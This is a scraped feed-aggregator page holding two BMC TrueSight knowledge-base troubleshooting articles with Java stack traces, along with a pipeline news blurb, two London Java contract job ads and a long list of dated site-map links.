    at com.bmc.truesight.usermgmt.rest.providers.servicefactory.UserAccountAuthenticationExecutionService.execute(UserAccountAuthenticationExecutionService.java:188)
    at com.bmc.truesight.usermgmt.rest.providers.UserAccountProvider.doLogin(UserAccountProvider.java:58)
    at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    at java.lang.reflect.Method.invoke(Method.java:497)
    at com.bmc.truesight.rest.system.InvocationOrchestrator.invoke(InvocationOrchestrator.java:71)
    at com.sun.proxy.$Proxy108.doLogin(Unknown Source)
    at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    at java.lang.reflect.Method.invoke(Method.java:497)
    at org.jboss.resteasy.core.MethodInjectorImpl.invoke(MethodInjectorImpl.java:137)
    at org.jboss.resteasy.core.ResourceMethodInvoker.invokeOnTarget(ResourceMethodInvoker.java:296)
    at org.jboss.resteasy.core.ResourceMethodInvoker.invoke(ResourceMethodInvoker.java:250)
    at org.jboss.resteasy.core.ResourceLocatorInvoker.invokeOnTargetObject(ResourceLocatorInvoker.java:140)
    at org.jboss.resteasy.core.ResourceLocatorInvoker.invoke(ResourceLocatorInvoker.java:103)
    at org.jboss.resteasy.core.SynchronousDispatcher.invoke(SynchronousDispatcher.java:356)
    at org.jboss.resteasy.core.SynchronousDispatcher.invoke(SynchronousDispatcher.java:179)
    at org.jboss.resteasy.plugins.server.servlet.ServletContainerDispatcher.service(ServletContainerDispatcher.java:220)
    at org.jboss.resteasy.plugins.server.servlet.HttpServletDispatcher.service(HttpServletDispatcher.java:56)
    at org.jboss.resteasy.plugins.server.servlet.HttpServletDispatcher.service(HttpServletDispatcher.java:51)
    at javax.servlet.http.HttpServlet.service(HttpServlet.java:729)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:291)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:239)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at com.bmc.tsps.common.services.server.HighAvailabilityFilter.doFilter(HighAvailabilityFilter.java:29)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:239)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at org.apache.shiro.web.servlet.ProxiedFilterChain.doFilter(ProxiedFilterChain.java:61)
    at org.apache.shiro.web.servlet.AdviceFilter.executeChain(AdviceFilter.java:108)
    at org.apache.shiro.web.servlet.AdviceFilter.doFilterInternal(AdviceFilter.java:137)
    at org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
    at org.apache.shiro.web.servlet.ProxiedFilterChain.doFilter(ProxiedFilterChain.java:66)
    at org.apache.shiro.web.servlet.AbstractShiroFilter.executeChain(AbstractShiroFilter.java:449)
    at org.apache.shiro.web.servlet.AbstractShiroFilter$1.call(AbstractShiroFilter.java:365)
    at org.apache.shiro.subject.support.SubjectCallable.doCall(SubjectCallable.java:90)
    at org.apache.shiro.subject.support.SubjectCallable.call(SubjectCallable.java:83)
    at org.apache.shiro.subject.support.DelegatingSubject.execute(DelegatingSubject.java:383)
    at org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:362)
    at org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:239)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:212)
    at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:106)
    at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:614)
    at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:141)
    at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:79)
    at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:616)
    at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:88)
    at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:518)
    at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1096)
    at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:674)
    at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:277)
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
    at java.lang.Thread.run(Thread.java:745)
 


CAUSE:

ASSO is configured to use only TLSv1.2 and TSPS is first trying TLSv1.0


SOLUTION:

See KA 000130343 - https://bmcsites.force.com/casemgmt/sc_KnowledgeArticle?sfdcid=kA014000000l8JDCAY&type=FAQ


Article Number:

000130344


Article Type:

Solutions to a Product Problem



  Looking for additional information?    Search BMC Support  or  Browse Knowledge Articles

          Unable to reach to login page of Truesight Infrastructure Management server      Cache   Translate Page   Web Page Cache   

This document contains official content from the BMC Software Knowledge Base. It is automatically updated when the knowledge article is modified.


PRODUCT:

TrueSight Infrastructure Management


COMPONENT:

TrueSight Operations Management


APPLIES TO:

Truesight Infrastructure Management Server version 10.x



PROBLEM:

We are unable to reach to the login page of the Truesight Infrstructure Management server.  With TSPS console we are able to see the events and the data. Also the pw p l and pw lic list shows correct output still the Users console is not accessible.

In the TrueSight\pw\tomcat\logs\catalina.log file we saw this exception :

INFO  07/29 09:43:53 org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/pronto] No Spring WebApplicationInitializer types detected on classpath
INFO  07/29 09:43:53 org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/pronto] Initializing Spring root WebApplicationContext
ERROR 07/29 09:43:53 org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/pronto] Exception starting filter Agent
java.lang.NoClassDefFoundError: Could not initialize class com.bmc.atrium.sso.agents.web.SSOFilter
    at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
    at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
    at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
    at java.lang.reflect.Constructor.newInstance(Constructor.java:408)
    at java.lang.Class.newInstance(Class.java:433)
    at org.apache.catalina.core.DefaultInstanceManager.newInstance(DefaultInstanceManager.java:121)
    at org.apache.catalina.core.ApplicationFilterConfig.getFilter(ApplicationFilterConfig.java:258)
    at org.apache.catalina.core.ApplicationFilterConfig.<init>(ApplicationFilterConfig.java:105)

 


CAUSE:

Product defect QM002128714


SOLUTION:

Delete the asso related log files from /tomcat/temp folder (PFA screenshot) and restart TSIM.


Article Number:

000118536


Article Type:

Solutions to a Product Problem



  Looking for additional information?    Search BMC Support  or  Browse Knowledge Articles

          ExxonMobil Joins Kinder Morgan, EagleClaw and Apache on Permian Highway Pipeline Project      Cache   Translate Page   Web Page Cache   
ExxonMobil signs a letter of intent; XTO Energy to be a shipper on pipeline HOUSTON–(BUSINESS WIRE)–$KMI #KinderMorgan–Kinder Morgan Texas Pipeline LLC (KMTP), a subsidiary of Kinder Morgan, Inc. (NYSE: KMI), EagleClaw Midstream Ventures, LLC (EagleClaw), a portfolio company of Blackstone Energy Partners, and Apache Corporation (NYSE, NASDAQ: APA) today announced that Exxon Mobil Corporation (NYSE: [Read More…]
          ExxonMobil Joins Kinder Morgan, EagleClaw And Apache On Permian Highway Pipeline Project      Cache   Translate Page   Web Page Cache   

Click to view a price quote on KMI.

Click to research the Energy industry.

          (IT) Java Developer - Microservices - 6 Month Contract      Cache   Translate Page   Web Page Cache   

Rate: £450 - £500 per day   Location: London   

Empiric are engaged with our Global client with based in London to secure 3x Java/Microservices Engineers for initial 6 month contracts with immediate starts. The client is looking for elite engineers to come in and build out a greenfield platform on an exciting and fast moving project. There is an option to WFH for the right candidate. To be right for this you must have experience in: Strong Java development experience Experience developing in a Microservices architecture (kubernetes would be an advantage) Experience with Apache Kafka and NoSQL Datastores/technologies Please apply for an urgent call back to discuss. Empiric is a global provider of niche and specialist recruitment services operating across Investment Banking, Oil & Gas, Engineering, IT and Industry & Commerce. Our expert knowledge of the market and strong working relationships with our clients has enabled us to become the preferred supplier to over 150 global corporations.
 
Rate: £450 - £500 per day
Type: Contract
Location: London
Country: UK
Contact: Empiric Solutions
Advertiser: Empiric Solutions
Start Date: ASAP
Reference: JS-DM04

          (IT) Java Security Developer - Multithreading Spring SOA Security SAML/WS Security       Cache   Translate Page   Web Page Cache   

Rate: £550 - £650 per Day   Location: London   

Java Security Developer - Multithreading Spring SOA Security SAML/WS Security - Investment Bank Java Security Developer with experience in Java development and experience with the following: Multi-threading, Spring (Core, AOP, MVC, DAO), Maven, App Security (XSS, SQL/HQL/LDAP/Etc injection, XSRF) SOA security - SAML/WS-Security. API development practices. Use of swagger etc. Familiar with DevOps pipeline tools: GIT/BitBucket, Artifactory, Jenkins, Ansible. Kerberos/SSL/TLS/PKI/GSS-API/SPNEGO Application Server: Good exposure in configuring and supporting web technologies such as Tomcat, Apache, Nginx. LDAP. Proven logical and methodical problem analysis and troubleshooting skills Clear communicator in both written and oral forms including specifications, architecture diagrams. Infrastructure standards for network load balancers, Servers, networks and storage Proven logical and methodical problem analysis and troubleshooting skills. Working with an industry recognised service desk and project management toolset Role: The SSO IDM team deal with support and project delivery on the Identity and access management technologies: Siteminder, LDAP, Axway gateways, ControlSA. The Java Security Developer will be part of a multi-disciplined team, providing development services for the SSO and Identity Management platforms Adlam Consulting operates as an Employment Agency & an Employment Business
 
Rate: £550 - £650 per Day
Type: Contract
Location: London
Country: UK
Contact: Adlam Consulting Ltd
Advertiser: Adlam Consulting Ltd
Email: Adlam.Consulting.B10DC.EF59F@apps.jobserve.com
Start Date: ASAP
Reference: JSADL02862



Next Page: 10000

Site Map 2018_01_14
Site Map 2018_01_15
Site Map 2018_01_16
Site Map 2018_01_17
Site Map 2018_01_18
Site Map 2018_01_19
Site Map 2018_01_20
Site Map 2018_01_21
Site Map 2018_01_22
Site Map 2018_01_23
Site Map 2018_01_24
Site Map 2018_01_25
Site Map 2018_01_26
Site Map 2018_01_27
Site Map 2018_01_28
Site Map 2018_01_29
Site Map 2018_01_30
Site Map 2018_01_31
Site Map 2018_02_01
Site Map 2018_02_02
Site Map 2018_02_03
Site Map 2018_02_04
Site Map 2018_02_05
Site Map 2018_02_06
Site Map 2018_02_07
Site Map 2018_02_08
Site Map 2018_02_09
Site Map 2018_02_10
Site Map 2018_02_11
Site Map 2018_02_12
Site Map 2018_02_13
Site Map 2018_02_14
Site Map 2018_02_15
Site Map 2018_02_15
Site Map 2018_02_16
Site Map 2018_02_17
Site Map 2018_02_18
Site Map 2018_02_19
Site Map 2018_02_20
Site Map 2018_02_21
Site Map 2018_02_22
Site Map 2018_02_23
Site Map 2018_02_24
Site Map 2018_02_25
Site Map 2018_02_26
Site Map 2018_02_27
Site Map 2018_02_28
Site Map 2018_03_01
Site Map 2018_03_02
Site Map 2018_03_03
Site Map 2018_03_04
Site Map 2018_03_05
Site Map 2018_03_06
Site Map 2018_03_07
Site Map 2018_03_08
Site Map 2018_03_09
Site Map 2018_03_10
Site Map 2018_03_11
Site Map 2018_03_12
Site Map 2018_03_13
Site Map 2018_03_14
Site Map 2018_03_15
Site Map 2018_03_16
Site Map 2018_03_17
Site Map 2018_03_18
Site Map 2018_03_19
Site Map 2018_03_20
Site Map 2018_03_21
Site Map 2018_03_22
Site Map 2018_03_23
Site Map 2018_03_24
Site Map 2018_03_25
Site Map 2018_03_26
Site Map 2018_03_27
Site Map 2018_03_28
Site Map 2018_03_29
Site Map 2018_03_30
Site Map 2018_03_31
Site Map 2018_04_01
Site Map 2018_04_02
Site Map 2018_04_03
Site Map 2018_04_04
Site Map 2018_04_05
Site Map 2018_04_06
Site Map 2018_04_07
Site Map 2018_04_08
Site Map 2018_04_09
Site Map 2018_04_10
Site Map 2018_04_11
Site Map 2018_04_12
Site Map 2018_04_13
Site Map 2018_04_14
Site Map 2018_04_15
Site Map 2018_04_16
Site Map 2018_04_17
Site Map 2018_04_18
Site Map 2018_04_19
Site Map 2018_04_20
Site Map 2018_04_21
Site Map 2018_04_22
Site Map 2018_04_23
Site Map 2018_04_24
Site Map 2018_04_25
Site Map 2018_04_26
Site Map 2018_04_27
Site Map 2018_04_28
Site Map 2018_04_29
Site Map 2018_04_30
Site Map 2018_05_01
Site Map 2018_05_02
Site Map 2018_05_03
Site Map 2018_05_04
Site Map 2018_05_05
Site Map 2018_05_06
Site Map 2018_05_07
Site Map 2018_05_08
Site Map 2018_05_09
Site Map 2018_05_15
Site Map 2018_05_16
Site Map 2018_05_17
Site Map 2018_05_18
Site Map 2018_05_19
Site Map 2018_05_20
Site Map 2018_05_21
Site Map 2018_05_22
Site Map 2018_05_23
Site Map 2018_05_24
Site Map 2018_05_25
Site Map 2018_05_26
Site Map 2018_05_27
Site Map 2018_05_28
Site Map 2018_05_29
Site Map 2018_05_30
Site Map 2018_05_31
Site Map 2018_06_01
Site Map 2018_06_02
Site Map 2018_06_03
Site Map 2018_06_04
Site Map 2018_06_05
Site Map 2018_06_06
Site Map 2018_06_07
Site Map 2018_06_08
Site Map 2018_06_09
Site Map 2018_06_10
Site Map 2018_06_11
Site Map 2018_06_12
Site Map 2018_06_13
Site Map 2018_06_14
Site Map 2018_06_15
Site Map 2018_06_16
Site Map 2018_06_17
Site Map 2018_06_18
Site Map 2018_06_19
Site Map 2018_06_20
Site Map 2018_06_21
Site Map 2018_06_22
Site Map 2018_06_23
Site Map 2018_06_24
Site Map 2018_06_25
Site Map 2018_06_26
Site Map 2018_06_27
Site Map 2018_06_28
Site Map 2018_06_29
Site Map 2018_06_30
Site Map 2018_07_01
Site Map 2018_07_02
Site Map 2018_07_03
Site Map 2018_07_04
Site Map 2018_07_05
Site Map 2018_07_06
Site Map 2018_07_07
Site Map 2018_07_08
Site Map 2018_07_09
Site Map 2018_07_10
Site Map 2018_07_11
Site Map 2018_07_12
Site Map 2018_07_13
Site Map 2018_07_14
Site Map 2018_07_15
Site Map 2018_07_16
Site Map 2018_07_17
Site Map 2018_07_18
Site Map 2018_07_19
Site Map 2018_07_20
Site Map 2018_07_21
Site Map 2018_07_22
Site Map 2018_07_23
Site Map 2018_07_24
Site Map 2018_07_25
Site Map 2018_07_26
Site Map 2018_07_27
Site Map 2018_07_28
Site Map 2018_07_29
Site Map 2018_07_30
Site Map 2018_07_31
Site Map 2018_08_01
Site Map 2018_08_02
Site Map 2018_08_03
Site Map 2018_08_04
Site Map 2018_08_05
Site Map 2018_08_06
Site Map 2018_08_07
Site Map 2018_08_08
Site Map 2018_08_09